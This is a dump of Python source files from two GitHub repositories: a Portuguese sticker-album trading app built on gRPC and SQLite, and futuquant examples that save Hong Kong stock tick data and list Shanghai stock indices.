`login` DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Figure` (
`idFigure` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`name` VARCHAR(45) NOT NULL,
`rarity` VARCHAR(10) NOT NULL,
`path` VARCHAR(45) NOT NULL);
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Album` (
`idUser` INTEGER NOT NULL,
`idFigure` INTEGER NOT NULL,
`quantity` INT NOT NULL DEFAULT 0,
PRIMARY KEY (`idFigure`, `idUser`),
CONSTRAINT `fk_Usuario_has_Figura_Usuario`
FOREIGN KEY (`idUser`)
REFERENCES `Usuario` (`idUser`)
ON DELETE CASCADE
ON UPDATE CASCADE,
CONSTRAINT `fk_Usuario_has_Figura_Figura1`
FOREIGN KEY (`idFigure`)
REFERENCES `Figure` (`idFigure`)
ON DELETE CASCADE
ON UPDATE CASCADE);
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Trade` (
`idTrade` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`idUser` INT NOT NULL,
`offer` INT NOT NULL,
`taking` INT NOT NULL,
CONSTRAINT `fk_Trade_Usuario1`
FOREIGN KEY (`idUser`)
REFERENCES `Usuario` (`idUser`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_Trade_Figure1`
FOREIGN KEY (`offer`)
REFERENCES `Figure` (`idFigure`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_Trade_Figure2`
FOREIGN KEY (`taking`)
REFERENCES `Figure` (`idFigure`)
ON DELETE NO ACTION
ON UPDATE NO ACTION);
""")
print('Tabelas criadas com sucesso.')
# desconectando...
conn.close()
|
adrianomqsmts/OneFigure-gRPC | view/album.py | <gh_stars>0
import json
from controller.client import Client
def albumview(user):
isvalid, complete, special, figures = _album(user)
if isvalid:
print('\n ------------ ALBUM ------------------')
print("ID | NOME | RARIDADE | QUANTIDADE")
for figure in figures:
print(figure.idFigure, '|', figure.name, '|', figure.rarity, '|', figure.quantity)
if complete == 1:
print('\nParabéns você completou o album e ganhou uma figurinha ESPECIAL exclusiva:\n')
print("ID | NOME | RARIDADE")
print(special.idFigure, '|', special.name, '|', special.rarity)
print()
return figures
else:
print('Lamentamos, mas não foi possível encontrar o álbum')
return None
def _album(user):
client = Client()
response = client.album(idUser=user.idUser)
isvalid = response.response
complete = response.complete
special = response.special
figures = response.figures
return isvalid, complete, special, figures
|
adrianomqsmts/OneFigure-gRPC | view/figura.py | import json
from controller.client import Client
def figureview(user):
isvalid, balance, figures = _figure(user)
if isvalid:
print('\n ------------ Figurinhas Adquiridas ------------------')
print("ID | NOME | RARIDADE | ")
for figure in figures:
print(figure.idFigure, '|', figure.name, '|', figure.rarity)
print('\nseu novo saldo é de', balance, "moedas")
print()
return figures
else:
print('Não foi possivel fazer a compra saldo insuficiente')
return None
def _figure(user):
client = Client()
response = client.buy(idUser=user.idUser)
isvalid = response.response
balance = response.balance
figures = response.figures
return isvalid, balance, figures
def figuresellview(user, figure):
isvalid, price, name = _figuresell(user, figure)
if isvalid:
print('\n ------------ Figurinhas Vendidas ------------------')
print(name, 'por', price, 'moedas')
print()
return isvalid, name, price
else:
print('Não foi possivel fazer a venda, você não possui uma ou mais cópias dessa figurinha')
return None, None, None
def _figuresell(user, idFigure):
client = Client()
response = client.sell(idUser=user.idUser, idFigure=int(idFigure))
isvalid = response.response
price = response.price
name = response.name
return isvalid, price, name
|
adrianomqsmts/OneFigure-gRPC | SQLite/connect.py | <filename>SQLite/connect.py
import sqlite3
conn = sqlite3.connect('oneFigure.db')
conn.close()
|
adrianomqsmts/OneFigure-gRPC | view/trade.py | <gh_stars>0
from controller.client import Client
def tradeview(user, idTrade):
isvalid = _trade(user.idUser, idTrade)
if isvalid:
print('A troca ocorreu com sucesso')
else:
print('Lamentamos, mas não foi possível finalizar a troca, verifique suas cartas')
return isvalid
def _trade(idUser, idTrade):
client = Client()
response = client.trade(idUser=idUser, idTrade=idTrade)
isvalid = response.response
return isvalid |
adrianomqsmts/OneFigure-gRPC | view/anunciar.py | <gh_stars>0
import json
from controller.client import Client
def anunciarview():
isvalid, trades = _anunciar()
if isvalid:
print("--------------------- LISTA DE TROCAS -------------------")
for trade in trades:
print("Usuário {", trade.name, '} - Código da Troca: {', trade.idTrade, '}')
print("Oferece -> ID figura: ", trade.offerID, '- Nome: ', trade.offerName, ' - Raridade: ',
trade.offerRarity)
print("Deseja <- ID figura: ", trade.takingID, '- Nome: ', trade.takingName, ' - Raridade: ',
trade.takingRarity)
print('--------------------- ------*----- -------------------')
return trades
else:
print('Lamentamos, mas não foi possível exibir as trocas')
return None
def _anunciar():
client = Client()
response = client.listTrade()
isvalid = response.response
trades = response.list
return isvalid, trades
|
adrianomqsmts/OneFigure-gRPC | proto/message_pb2_grpc.py | <gh_stars>0
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from proto import message_pb2 as proto_dot_message__pb2
class MessageStub(object):
"""Comando para gerar o proto:
python -m grpc_tools.protoc --proto_path=. .\proto\message.proto --python_out=. --grpc_python_out=.
Como escrever em PROTO
https://developers.google.com/protocol-buffers/docs/proto3
Como enviar um array de dados
https://stackoverflow.com/questions/43167762/how-to-return-an-array-in-protobuf-service-rpc
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Login = channel.unary_unary(
'/proto.Message/Login',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.LoginResponse.FromString,
)
self.Create = channel.unary_unary(
'/proto.Message/Create',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.Response.FromString,
)
self.Album = channel.unary_unary(
'/proto.Message/Album',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.AlbumResponse.FromString,
)
self.Buy = channel.unary_unary(
'/proto.Message/Buy',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.AlbumResponse.FromString,
)
self.Sell = channel.unary_unary(
'/proto.Message/Sell',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.SellResponse.FromString,
)
self.CreateTrade = channel.unary_unary(
'/proto.Message/CreateTrade',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.Response.FromString,
)
self.ListTrade = channel.unary_unary(
'/proto.Message/ListTrade',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.ListTradeResponse.FromString,
)
self.Trade = channel.unary_unary(
'/proto.Message/Trade',
request_serializer=proto_dot_message__pb2.MessageClient.SerializeToString,
response_deserializer=proto_dot_message__pb2.Response.FromString,
)
class MessageServicer(object):
"""Comando para gerar o proto:
python -m grpc_tools.protoc --proto_path=. .\proto\message.proto --python_out=. --grpc_python_out=.
Como escrever em PROTO
https://developers.google.com/protocol-buffers/docs/proto3
Como enviar um array de dados
https://stackoverflow.com/questions/43167762/how-to-return-an-array-in-protobuf-service-rpc
"""
def Login(self, request, context):
"""Chamar a função Login do servidor passando a mensagem LOGIN do cliente
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Chama a função do servidor para cadastrar um novo usuário
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Album(self, request, context):
"""Chama a função do servidor para visualizar o álbum
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Buy(self, request, context):
"""Chama a função do servidor que realiza a compra e exibe as figurinhas
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Sell(self, request, context):
"""Chama a função venda e mostra as figuras adquiridas
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateTrade(self, request, context):
"""Chama a função de criação de trocas e response se criou ou não
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListTrade(self, request, context):
"""Chama a função para exibir todas as trocas cadastradas
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Trade(self, request, context):
"""Chama a função para exibir todas as trocas cadastradas
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MessageServicer_to_server(servicer, server):
rpc_method_handlers = {
'Login': grpc.unary_unary_rpc_method_handler(
servicer.Login,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.LoginResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.Response.SerializeToString,
),
'Album': grpc.unary_unary_rpc_method_handler(
servicer.Album,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.AlbumResponse.SerializeToString,
),
'Buy': grpc.unary_unary_rpc_method_handler(
servicer.Buy,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.AlbumResponse.SerializeToString,
),
'Sell': grpc.unary_unary_rpc_method_handler(
servicer.Sell,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.SellResponse.SerializeToString,
),
'CreateTrade': grpc.unary_unary_rpc_method_handler(
servicer.CreateTrade,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.Response.SerializeToString,
),
'ListTrade': grpc.unary_unary_rpc_method_handler(
servicer.ListTrade,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.ListTradeResponse.SerializeToString,
),
'Trade': grpc.unary_unary_rpc_method_handler(
servicer.Trade,
request_deserializer=proto_dot_message__pb2.MessageClient.FromString,
response_serializer=proto_dot_message__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'proto.Message', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Message(object):
"""Comando para gerar o proto:
python -m grpc_tools.protoc --proto_path=. .\proto\message.proto --python_out=. --grpc_python_out=.
Como escrever em PROTO
https://developers.google.com/protocol-buffers/docs/proto3
Como enviar um array de dados
https://stackoverflow.com/questions/43167762/how-to-return-an-array-in-protobuf-service-rpc
"""
@staticmethod
def Login(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/Login',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.LoginResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/Create',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Album(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/Album',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.AlbumResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Buy(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/Buy',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.AlbumResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Sell(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/Sell',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.SellResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateTrade(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/CreateTrade',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListTrade(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/ListTrade',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.ListTradeResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Trade(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/proto.Message/Trade',
proto_dot_message__pb2.MessageClient.SerializeToString,
proto_dot_message__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
adrianomqsmts/OneFigure-gRPC | controller/connect.py | def connect():
import sqlite3
conn = sqlite3.connect('oneFigure.db')
return conn
# Fonte: http://pythonclub.com.br/gerenciando-banco-dados-sqlite3-python-parte1.html
|
xxm1988/futuquant | futuquant/examples/app/tq_save_tick/TinyStrateSaveTick.py | # encoding: UTF-8
'''
实盘策略范例,接口用法见注释及范例代码
'''
import talib
import sqlite3
import platform
import multiprocessing
from sqlalchemy import create_engine
from futuquant.examples.TinyQuant.TinyStrateBase import *
class SaveTickData():
def __init__(self,stock_code):
self.stock_code = stock_code
self.code_suffix = stock_code.split('.')[1]
if platform.system() == "Windows":
self.sqlitedb_order = sqlite3.connect(u"F:\\StockData\\stock_order.db")
self.sqlitedb_tick = sqlite3.connect(u"F:\\StockData\\stock_tick.db")
else:
self.sqlitedb_order = sqlite3.connect(u"/data/ft_hist_data/tick_data/stock_order.db")
self.sqlitedb_tick = sqlite3.connect(u"/data/ft_hist_data/tick_data/stock_tick.db")
def __del__(self):
self.sqlitedb_conn.close()
def exe_sql(self,sql_cmd,db='tick'):
if db == "tick":
cu = self.sqlitedb_tick.cursor()
else:
cu = self.sqlitedb_order.cursor()
cu.execute(sql_cmd)
return cu.fetchall()
def exe_sql_many(self,sql_cmd,insertDataList,db='tick'):
if db == "tick":
cu = self.sqlitedb_tick.cursor()
else:
cu = self.sqlitedb_order.cursor()
cu.executemany(sql_cmd,insertDataList)
return cu.fetchall()
def create_tick_table(self):
sql_cmd_create = """create TABLE IF NOT EXISTS tick_data_%s (
[date_key] DATE DEFAULT CURRENT_DATE,
[time] TIME DEFAULT CURRENT_TIME,
[code] TEXT,
[price] FLOAT,
[volume] FLOAT,
[turnover] FLOAT,
[ticker_direction] TEXT,
[sequence] TEXT pirmary key,
[type] TEXT ) """ % self.code_suffix
self.exe_sql(sql_cmd_create)
self.sqlitedb_tick.commit()
'askPrice1', 'askPrice2', 'askPrice3', 'askPrice4', 'askPrice5', 'askVolume1', 'askVolume2', 'askVolume3', 'askVolume4', 'askVolume5', 'bidPrice1', 'bidPrice2', 'bidPrice3', 'bidPrice4', 'bidPrice5', 'bidVolume1', 'bidVolume2', 'bidVolume3', 'bidVolume4', 'bidVolume5', 'date', 'datetime', 'highPrice', 'lastPrice', 'lowPrice', 'openPrice', 'preClosePrice', 'priceSpread', 'symbol', 'time', 'volume'
def create_order_table(self):
sql_cmd_create = """create TABLE IF NOT EXISTS order_data_%s (
[date_key] DATE DEFAULT CURRENT_DATE,
[time] TIME DEFAULT CURRENT_TIME,
[code] TEXT,
[askPrice1] FLOAT,
[askPrice2] FLOAT,
[askPrice3] FLOAT,
[askPrice4] FLOAT,
[askPrice5] FLOAT,
[askVolume1] FLOAT,
[askVolume2] FLOAT,
[askVolume3] FLOAT,
[askVolume4] FLOAT,
[askVolume5] FLOAT,
[bidPrice1] FLOAT,
[bidPrice2] FLOAT,
[bidPrice3] FLOAT,
[bidPrice4] FLOAT,
[bidPrice5] FLOAT,
[bidVolume1] FLOAT,
[bidVolume2] FLOAT,
[bidVolume3] FLOAT,
[bidVolume4] FLOAT,
[bidVolume5] FLOAT,
[highPrice] FLOAT,
[lowPrice] FLOAT,
[lastPrice] FLOAT,
[openPrice] FLOAT,
[preClosePrice] FLOAT,
[priceSpread] FLOAT,
[volume] FLOAT ) """ % self.code_suffix
self.exe_sql(sql_cmd_create)
self.sqlitedb_tick.commit()
def save_data_tick(self,df):
sql_cmd = """ replace into stock_list_new(time,code,price,volume,turnover,ticker_direction,sequence,type) values(?,?,?,?,?,?,?,?) """
insertItemList = []
for row in df.itertuples():
insertItemList.append((row['time'],row['code'],row['price'],row['volume'],row['turnover'],row['ticker_direction'],row['sequence'],row['type'] ))
result = self.exe_sql_many(sql_cmd,insertItemList)
self.sqlitedb_tick.commit()
return result
def save_data_order(self,data_list):
sql_cmd = """ insert into stock_list_new(date_key,time,code,askPrice1,askPrice2,askPrice3,askPrice4,askPrice5,askVolume1,askVolume2,askVolume3,askVolume4,askVolume5,bidPrice1,bidPrice2,bidPrice3,bidPrice4,bidPrice5,bidVolume1,bidVolume2,bidVolume3,bidVolume4,bidVolume5,highPrice,lowPrice,lastPrice,openPrice,preClosePrice,priceSpread,volume) values(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) """
insertItemList = []
for row in data_list:
insertItemList.append((row['date'],row['time'],row['code'],row['askPrice1'],row['askPrice2'],row['askPrice3'],row['askPrice4'],row['askPrice5'],row['askVolume1'],row['askVolume2'],row['askVolume3'],row['askVolume4'],row['askVolume5'],row['bidPrice1'],row['bidPrice2'],row['bidPrice3'],row['bidPrice4'],row['bidPrice5'],row['bidVolume1'],row['bidVolume2'],row['bidVolume3'],row['bidVolume4'],row['bidVolume5'],row['highPrice'],row['lowPrice'],row['lastPrice'],row['openPrice'],row['preClosePrice'],row['priceSpread'],row['volume']))
result = self.exe_sql_many(sql_cmd,insertItemList)
self.sqlitedb_tick.commit()
return result
def save_queue_data(self,symbol,data_queue):
last_time = time.time()
data_list = []
while True:
print("[%s] data_queue size is %s " % (symbol,data_queue.qsize()))
tiny_quote = data_queue.get()
data_list.append(tiny_quote)
now_time = time.time()
save_flag = False
if len(data_list) > 10:
self.save_data_order(data_list)
data_list = []
save_flag = True
print("[%s] save data length [%s]" % (symbol,len(data_list)))
elif now_time - last_time > 5 and len(data_list) > 0:
self.save_data_order(data_list)
data_list = []
save_flag = True
last_time = now_time
print("[%s] timeout save data length [%s]" % (symbol,len(data_list)))
if not save_flag:
time.sleep(1)
class TinyStrateSaveTick(TinyStrateBase):
"""策略名称, setting.json中作为该策略配置的key"""
name = 'tiny_strate_sample'
"""策略需要用到行情数据的股票池"""
symbol_pools = ['HK.00700','HK.80000','HK.59972','HK.59828','HK.66115','HK.66490']
def __init__(self):
super(TinyStrateSaveTick, self).__init__()
"""请在setting.json中配置参数"""
self.param1 = None
self.param2 = None
self.data_queue_dict = {}
self.pool = multiprocessing.Pool(processes = 1 )
def on_init_strate(self):
"""策略加载完配置后的回调
1. 可修改symbol_pools 或策略内部其它变量的初始化
2. 此时还不能调用futu api的接口
"""
for symbol in TinyStrateSaveTick.symbol_pools:
self.data_queue_dict[symbol.split('.')[1]] = multiprocessing.Manager().Queue()
stdObj = SaveTickData(symbol.split('.')[1])
self.pool.apply_async(stdObj.save_queue_data,(symbol,self.data_queue_dict[symbol.split('.')[1]]))
def on_start(self):
"""策略启动完成后的回调
1. 框架已经完成初始化, 可调用任意的futu api接口
2. 修改symbol_pools无效, 不会有动态的行情数据回调
"""
self.log("on_start param1=%s param2=%s" %(self.param1, self.param2))
"""交易接口测试
ret, data = self.buy(4.60, 1000, 'HK.03883')
if 0 == ret:
order_id = data
ret, data = self.get_tiny_trade_order(order_id)
if 0 == ret:
str_info = ''
for key in data.__dict__.keys():
str_info += "%s='%s' " % (key, data.__dict__[key])
print str_info
ret, data = self.sell(11.4, 1000, 'HK.01357')
if 0 == ret:
order_id = data
self.cancel_order(order_id)
"""
def on_quote_changed(self, tiny_quote):
"""报价、摆盘实时数据变化时,会触发该回调"""
# TinyQuoteData
symbol = tiny_quote.symbol
self.log("get data from {%s}" % symbol)
self.data_queue_dict[symbol.split('.')[1]].put(tiny_quote)
def on_bar_min1(self, tiny_bar):
"""每一分钟触发一次回调"""
bar = tiny_bar
symbol = bar.symbol
str_dt = bar.datetime.strftime("%Y%m%d %H:%M:%S")
# 得到分k数据的ArrayManager(vnpy)对象
am = self.get_kl_min1_am(symbol)
array_high = am.high
array_low = am.low
array_open = am.open
array_close = am.close
array_vol = am.volume
n = 5
ma_high = self.ema(array_high, n)
ma_low = self.ema(array_low, n)
ma_open = self.ema(array_open, n)
ma_close = self.ema(array_close, n)
ma_vol = self.ema(array_vol, n)
str_log = "on_bar_min1 symbol=%s dt=%s ema(%s) open=%s high=%s close=%s low=%s vol=%s" % (
symbol, str_dt, n, ma_open, ma_high, ma_close, ma_low, ma_vol)
self.log(str_log)
def on_bar_day(self, tiny_bar):
"""收盘时会触发一次日k回调"""
bar = tiny_bar
symbol = bar.symbol
str_dt = bar.datetime.strftime("%Y%m%d %H:%M:%S")
str_log = "on_bar_day symbol=%s dt=%s open=%s high=%s close=%s low=%s vol=%s" % (
symbol, str_dt, bar.open, bar.high, bar.close, bar.low, bar.volume)
self.log(str_log)
def on_before_trading(self, date_time):
"""开盘时触发一次回调, 脚本挂机切换交易日时,港股会在09:30:00回调"""
str_log = "on_before_trading - %s" % date_time.strftime('%Y-%m-%d %H:%M:%S')
self.log(str_log)
def on_after_trading(self, date_time):
"""收盘时触发一次回调, 脚本挂机时,港股会在16:00:00回调"""
str_log = "on_after_trading - %s" % date_time.strftime('%Y-%m-%d %H:%M:%S')
self.log(str_log)
def sma(self, np_array, n, array=False):
"""简单均线"""
if n < 2:
result = np_array
else:
result = talib.SMA(np_array, n)
if array:
return result
return result[-1]
def ema(self, np_array, n, array=False):
"""移动均线"""
if n < 2:
result = np_array
else:
result = talib.EMA(np_array, n)
if array:
return result
return result[-1]
|
xxm1988/futuquant | futuquant/examples/learn/get_index_stocks.py | # -*- coding: utf-8 -*-
"""
得到一个指数下面所有的股票信息
"""
import futuquant as ft
# 如下数据源由 enum_all_index_stocks 接口生成, 后续请自行手动运行更新
'''SH INDEX
code name
0 SH.000000 060001
1 SH.000001 上证指数
2 SH.000002 A股指数
3 SH.000003 B股指数
4 SH.000004 工业指数
5 SH.000005 商业指数
6 SH.000006 地产指数
7 SH.000007 公用指数
8 SH.000008 综合指数
9 SH.000009 上证380
10 SH.000010 上证180
11 SH.000011 基金指数
12 SH.000012 国债指数
13 SH.000013 企债指数
14 SH.000015 红利指数
15 SH.000016 上证50
16 SH.000017 新综指
17 SH.000018 180金融
18 SH.000019 治理指数
19 SH.000020 中型综指
20 SH.000021 180治理
21 SH.000022 沪公司债
22 SH.000023 沪分离债
23 SH.000025 180基建
24 SH.000026 180资源
25 SH.000027 180运输
26 SH.000028 180成长
27 SH.000029 180价值
28 SH.000030 180R成长
29 SH.000031 180R价值
30 SH.000032 上证能源
31 SH.000033 上证材料
32 SH.000034 上证工业
33 SH.000035 上证可选
34 SH.000036 上证消费
35 SH.000037 上证医药
36 SH.000038 上证金融
37 SH.000039 上证信息
38 SH.000040 上证电信
39 SH.000041 上证公用
40 SH.000042 上证央企
41 SH.000043 超大盘
42 SH.000044 上证中盘
43 SH.000045 上证小盘
44 SH.000046 上证中小
45 SH.000047 上证全指
46 SH.000048 责任指数
47 SH.000049 上证民企
48 SH.000050 50等权
49 SH.000051 180等权
50 SH.000052 50基本
51 SH.000053 180基本
52 SH.000054 上证海外
53 SH.000055 上证地企
54 SH.000056 上证国企
55 SH.000057 全指成长
56 SH.000058 全指价值
57 SH.000059 全R成长
58 SH.000060 全R价值
59 SH.000061 沪企债30
60 SH.000062 上证沪企
61 SH.000063 上证周期
62 SH.000064 非周期
63 SH.000065 上证龙头
64 SH.000066 上证商品
65 SH.000067 上证新兴
66 SH.000068 上证资源
67 SH.000069 消费80
68 SH.000070 能源等权
69 SH.000071 材料等权
70 SH.000072 工业等权
71 SH.000073 可选等权
72 SH.000074 消费等权
73 SH.000075 医药等权
74 SH.000076 金融等权
75 SH.000077 信息等权
76 SH.000078 电信等权
77 SH.000079 公用等权
78 SH.000090 上证流通
79 SH.000091 沪财中小
80 SH.000092 资源50
81 SH.000093 180分层
82 SH.000094 上证上游
83 SH.000095 上证中游
84 SH.000096 上证下游
85 SH.000097 高端装备
86 SH.000098 上证F200
87 SH.000099 上证F300
88 SH.000100 上证F500
89 SH.000101 5年信用
90 SH.000102 沪投资品
91 SH.000103 沪消费品
92 SH.000104 380能源
93 SH.000105 380材料
94 SH.000106 380工业
95 SH.000107 380可选
96 SH.000108 380消费
97 SH.000109 380医药
98 SH.000110 380金融
99 SH.000111 380信息
100 SH.000112 380电信
101 SH.000113 380公用
102 SH.000114 持续产业
103 SH.000115 380等权
104 SH.000116 信用100
105 SH.000117 380成长
106 SH.000118 380价值
107 SH.000119 380R成长
108 SH.000120 380R价值
109 SH.000121 医药主题
110 SH.000122 农业主题
111 SH.000123 180动态
112 SH.000125 180稳定
113 SH.000126 消费50
114 SH.000128 380基本
115 SH.000129 180波动
116 SH.000130 380波动
117 SH.000131 上证高新
118 SH.000132 上证100
119 SH.000133 上证150
120 SH.000134 上证银行
121 SH.000135 180高贝
122 SH.000136 180低贝
123 SH.000137 380高贝
124 SH.000138 380低贝
125 SH.000139 上证转债
126 SH.000141 380动态
127 SH.000142 380稳定
128 SH.000145 优势资源
129 SH.000146 优势制造
130 SH.000147 优势消费
131 SH.000148 消费领先
132 SH.000149 180红利
133 SH.000150 380红利
134 SH.000151 上国红利
135 SH.000152 上央红利
136 SH.000153 上民红利
137 SH.000155 市值百强
138 SH.000158 上证环保
139 SH.000159 沪股通
140 SH.000160 沪新丝路
141 SH.000161 沪中国造
142 SH.000162 沪互联+
143 SH.000170 50AH优选
144 SH.000171 新兴成指
145 SH.000188 中国波指
146 SH.000300 沪深300
147 SH.000801 资源80
148 SH.000802 500沪市
149 SH.000803 300波动
150 SH.000804 500波动
151 SH.000805 A股资源
152 SH.000806 消费服务
153 SH.000807 食品饮料
154 SH.000808 医药生物
155 SH.000809 细分农业
156 SH.000810 细分能源
157 SH.000811 细分有色
158 SH.000812 细分机械
159 SH.000813 细分化工
160 SH.000814 细分医药
161 SH.000815 细分食品
162 SH.000816 细分地产
163 SH.000817 兴证海峡
164 SH.000818 细分金融
165 SH.000819 有色金属
166 SH.000820 煤炭指数
167 SH.000821 300红利
168 SH.000822 500红利
169 SH.000823 800有色
170 SH.000824 国企红利
171 SH.000825 央企红利
172 SH.000826 民企红利
173 SH.000827 中证环保
174 SH.000828 300高贝
175 SH.000829 300低贝
176 SH.000830 500高贝
177 SH.000831 500低贝
178 SH.000832 中证转债
179 SH.000833 中高企债
180 SH.000838 创业价值
181 SH.000839 浙企综指
182 SH.000840 浙江民企
183 SH.000841 800医药
184 SH.000842 800等权
185 SH.000843 300动态
186 SH.000844 300稳定
187 SH.000846 ESG100
188 SH.000847 腾讯济安
189 SH.000849 300非银
190 SH.000850 300有色
191 SH.000851 百发100
192 SH.000852 中证1000
193 SH.000853 CSSW丝路
194 SH.000854 500原料
195 SH.000855 央视500
196 SH.000856 500工业
197 SH.000857 500医药
198 SH.000858 500信息
199 SH.000863 CS精准医
200 SH.000865 上海国企
201 SH.000867 港中小企
202 SH.000869 HK银行
203 SH.000874 000874
204 SH.000891 新兴综指
205 SH.000901 小康指数
206 SH.000902 中证流通
207 SH.000903 中证100
208 SH.000904 中证200
209 SH.000905 中证500
210 SH.000906 中证800
211 SH.000907 中证700
212 SH.000908 300能源
213 SH.000909 300材料
214 SH.000910 300工业
215 SH.000911 300可选
216 SH.000912 300消费
217 SH.000913 300医药
218 SH.000914 300金融
219 SH.000915 300信息
220 SH.000916 300电信
221 SH.000917 300公用
222 SH.000918 300成长
223 SH.000919 300价值
224 SH.000920 300R成长
225 SH.000921 300R价值
226 SH.000922 中证红利
227 SH.000923 公司债
228 SH.000924 分离债
229 SH.000925 基本面50
230 SH.000926 中证央企
231 SH.000927 央企100
232 SH.000928 中证能源
233 SH.000929 中证材料
234 SH.000930 中证工业
235 SH.000931 中证可选
236 SH.000932 中证消费
237 SH.000933 中证医药
238 SH.000934 中证金融
239 SH.000935 中证信息
240 SH.000936 中证电信
241 SH.000937 中证公用
